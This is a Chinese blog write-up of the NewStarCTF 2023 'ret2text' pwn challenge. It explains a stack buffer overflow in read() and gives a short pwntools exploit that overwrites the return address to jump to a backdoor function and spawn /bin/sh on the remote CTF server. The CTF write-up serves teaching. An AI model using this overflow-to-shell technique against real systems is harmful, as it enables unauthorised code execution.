NewStarCTF 2023 WEEK1|PWN ret2text

最新推荐文章于 2024-07-31 22:25:14 发布
最新推荐文章于 2024-07-31 22:25:14 发布
阅读量522 收藏
点赞数
分类专栏: CTF 文章标签: 服务器 运维 安全威胁分析 安全 web安全 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wp568/article/details/133689891
版权

拖进IDA,查看

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[32]; // [rsp+0h] [rbp-20h] BYREF

  init();
  puts("Welcome to NewStar CTF!!");
  puts("Show me your magic");
  read(0, buf, 0x100uLL);
  return 0;
}

main函数,里read函数,分配了32(0x20)个大小 指定了0x100,有栈溢出漏洞

int backdoor()
{
  puts("Congratulations!!!");
  return execve("/bin/sh", 0LL, 0LL);
}

又发现了后门函数,

; Attributes: bp-based frame

public backdoor
backdoor proc near
; __unwind {
endbr64
push    rbp
mov     rbp, rsp
lea     rax, s          ; "Congratulations!!!"
mov     rdi, rax        ; s
call    _puts
mov     edx, 0          ; envp
mov     esi, 0          ; argv
lea     rax, path       ; "/bin/sh"
mov     rdi, rax        ; path
call    _execve
nop
pop     rbp
retn
; } // starts at 4011FB
backdoor endp

查看起始地址 为4011FB

  • payload = b'a'*(0x20 + 0x8) + p64(0x4011FB)

完整exp:

from __future__ import absolute_import
from pwn import *  
p=remote(u"node4.buuoj.cn",27131) 
payload = b'a'*(0x20 + 0x8) + p64(0x4011FB)
p.sendline(payload)
p.interactive()

半两八金
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
学习OpenCV范例(二十三)—GMM前景检测(一)
chenjiazhou12的专栏
06-08 1万+
前一篇博客中有谈论到混合高斯模型GMM,但是只是在上面的一个小应用,可能没有很彻底的分析,大部分读者看起来有点吃力,那么在这篇微博中就给大家分析一下GMM在前景检测的原理以及在OpenCV中的运用,当然长篇大论的原理我还是不全部写出来的,依旧会贴出其他高手的博客,他们写的个人觉得已经够详细了,再总结已经没什么意思了,也总结不出太多的新意,在这里也是作为记录,谈谈自己的小感悟以及运行的结果和函数的使
运动目标检测_混合高斯背景建模
热门推荐
沈春旭的博客
03-09 2万+
1.混合搞死背景建模理论 混合高斯背景建模是基于像素样本统计信息的背景表示方法,利用像素在较长时间内大量样本值的概率密度等统计信息(如模式数量、每个模式的均值和标准差)表示背景,然后使用统计差分(如3σ原则)进行目标像素判断,可以对复杂动态背景进行建模,计算量较大。 在混合高斯背景模型中,认为像素之间的颜色信息互不相关,对各像素点的处理都是相互独立的。对于视频图像中的每一个像素点,其值在序
[NewStarCTF 公开赛]ret2text 94
最新发布
2302_81899310的博客
07-31 181
在main函数打个断点进行动态分析发现共需填入0x20个字符型数据,且还需填写8个数据将原来末尾的数据覆盖,然后将main函数的返回地址写为后门函数的地址,写出攻击脚本。根据题目ret2text的提示,我们可以构造payload,在栈内填充垃圾数据,从而使得main函数的返回地址为后门函数的地址,进而拿取到机器的控制权,获取flag.利用pwndbg进行动态分析时发现没有执行权限,所以我们要利用chmod命令加权。确实是后门函数,并且有函数存在栈溢出的漏洞。发现一个后门函数,点进去确认一下。
前景检测算法_3(GMM)
weixin_33816300的博客
06-02 1177
摘要     本文通过opencv来实现一种前景检测算法——GMM,算法采用的思想来自论文[1][2][4]。在进行前景检测前,先对背景进行训练,对图像中每个背景采用一个混合高斯模型进行模拟,每个背景的混合高斯的个数可以自适应。然后在测试阶段,对新来的像素进行GMM匹配,如果该像素值能够匹配其中一个高斯,则认为是背景,否则认为是前景。由于整个过程GMM模型在不断更新学习中,所以对动态背景有一定...
高斯混合模型(GMM)算法理解及代码实现(opencv)
molihong28的博客
04-15 5108
GMM在数据聚类和图像分类中有很重要的应用。 概念理解: (1)条件概率: (2)先验概率:在有一定量数据的前提下,我们对参数进行概率估计,事件发生前的预判概率。 (3)后验概率:在最合适的那个参数的前提下,观测数据出现的最大概率。 (4)极大似然估计:找到一组参数使得我们观测到的数据出现的概率最大。 (5)高斯分布:,概率密度函数。其中N的两个参数第一个代表均值,第二个代表协方差矩阵。 (6)...
跟着CTF-wiki学pwn——ret2text
qq_42882717的博客
06-21 1142
肾么叫做万死不辞呀,就是每天被气死一万次,也不辞职…(哭哭
入门pwn题目ret2text
03-26
入门pwn题目ret2text
PWN ret2text
prettyX的博客
11-21 924
今天跟着B站UP学习了ROP,向UP表示感谢。 0X01 什么是ROP ROP就是shellcode的一种特殊写法。ROP技术就是不需要自己动手写shellcode,只是利用文件中给出的多个跳转指令,实现利用原有代码达到获取shell的目的。 0X02 ROP使用的地方 1、当程序开启了NX保护机制;NX策略是使栈区域的代码无法执行,但我们可以使用RO...
pwn小白入门03---ret2text
weixin_45943522的博客
02-21 6479
什么是栈溢出: 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变(比如gets函数,他不会去验证你输入的值的长度,通过这个函数,你可以往一个本身大小为4字节的数组中填入任意大小的数据,如果填入8字节的数据,将会导致栈溢出,进而程序报错)。就像是往杯子里倒水,水满了溢出来最后烫到你一样。 最简单的栈溢出利用:ret2text 通过栈溢出修改call指令保存在栈上的返回地址(eip的值),这样cpu执行ret指令的时候,就会将被修改的值从栈上取
NewStarCTF2023week3
10-20
NewStarCTF2023week3是一场CTF比赛,其中包含了各种类型的题目,例如Web、Crypto、Pwn等等。其中,引用和引用是该比赛中的两题目的flag,而引用则是一篇关于该比赛中Crypto题目chaos的Writeup。如果你对CTF比赛感...
攻防世界PWN之EasyPwn题解
seaaseesa的博客
11-15 3819
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT表 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到栈底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
CTFshow-pwn入门-前置基础pwn13-pwn19
T1ngSh0w的博客
06-17 1955
ctfshow pwn入门-前置基础pwn13-pwn19
背景建模gmm + 追踪sort原理及基于opencv的c++代码实现
qq_40629612的博客
12-04 1481
​​
NewStarCTF 2023 公开赛 Web
m0_73728268的博客
11-05 3511
泄露的秘密,直接看常见的目录robots.txt,www.zip直接那两段flag也可以用dirsearch工具扫描,但是BUUOJ平台的网站只能开底线程,不然全是429。
NewStarCTF 2023 WEEK1 pwn AK
YX-hueimie
10-01 1057
比赛的wp就不写漏洞原理了,需要的话可以评论,每个题目的主要漏洞都标注在题目旁边的括号里了,可以自己去搜索学习。
NewStarCTFWEEK1部分题解
m0_51251108的博客
09-26 944
NewStarCTFWEEK1
堆栈解题练习二
weixin_44222568的博客
04-22 1773
惶惶乎如遗世独立,羽化而登仙。。。。。
一篇文章玩明白Stack-migration
YJ_12340的博客
08-02 345
Intel汇编,栈溢出利用,基础rop链当我们发现存在栈溢出漏洞,但是溢出字节非常小,比如0x10的时候我们就需要利用栈迁移,将栈迁移置足够大的区段去编写rop链以达到我们利用的目的。为了方便教学,这里以CTF赛题的形式进行教学。这里我用我出给自己校赛的一题作为讲解,给出了栈的地址 这里是刚好溢出了0x10,并且给出了当前变量所处的栈地址,对于这种题目,都是直接套路杀的,而且这题没有开启canary和pie我们只需要和往常一样先编写好rop链,再利用leave命令把栈迁移到到所给的bss段或者栈地址
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半两八金

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值